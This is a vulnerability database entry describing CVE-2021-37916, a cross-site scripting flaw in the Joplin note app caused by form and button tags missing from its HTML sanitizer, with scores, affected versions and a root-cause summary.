Miggo Logo
Miggo Vulnerability Database
CVE-2021-37916

CVE-2021-37916: Joplin vulnerable to Cross-site Scripting in notes

6.1

CVSS Score
3.1

Basic Information

CVE ID
CVE-2021-37916
GHSA ID
GHSA-mrmf-755g-w2vw
EPSS Score
0.49477%
CWE
CWE-79
Published
5/24/2022
Updated
4/23/2024
KEV Status
No
Technology
TechnologyJavaScript

Technical Details

CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
Package NameEcosystemVulnerable VersionsFirst Patched Version
joplinnpm< 2.0.92.0.9

Vulnerability Intelligence
Miggo AIMiggo AI

Miggo AIRoot Cause Analysis

The vulnerability stems from incomplete HTML sanitization in Joplin's rendering pipeline. The commit diff shows the vulnerable version lacked form-related tags in the disallowedTags array. The HtmlUtils class in htmlUtils.ts handles HTML sanitization using this array to filter dangerous elements. Since form elements weren't blocked, any function processing user-supplied HTML content using this sanitization logic would allow XSS payloads via attributes like onclick or form action handlers. The confidence is high because: 1) The patch explicitly adds these tags to the blocklist 2) The CVE description directly attributes the vulnerability to form/button elements 3) The file modified (htmlUtils.ts) is clearly part of the HTML rendering pipeline.

Vulnerable functions

Only Mi**o us*rs **n s** t*is s**tion

WAF Protection Rules

WAF Rule

Joplin ***or* *.*.* *llows *ross-sit* S*riptin* vi* *utton *n* *orm in t** not* *o*y.

Reasoning

T** vuln*r**ility st*ms *rom in*ompl*t* *TML s*nitiz*tion in Joplin's r*n**rin* pip*lin*. T** *ommit *i** s*ows t** vuln*r**l* v*rsion l**k** *orm-r*l*t** t**s in t** *is*llow**T**s *rr*y. T** `*tmlUtils` *l*ss in `*tmlUtils.ts` **n*l*s *TML s*nitiz*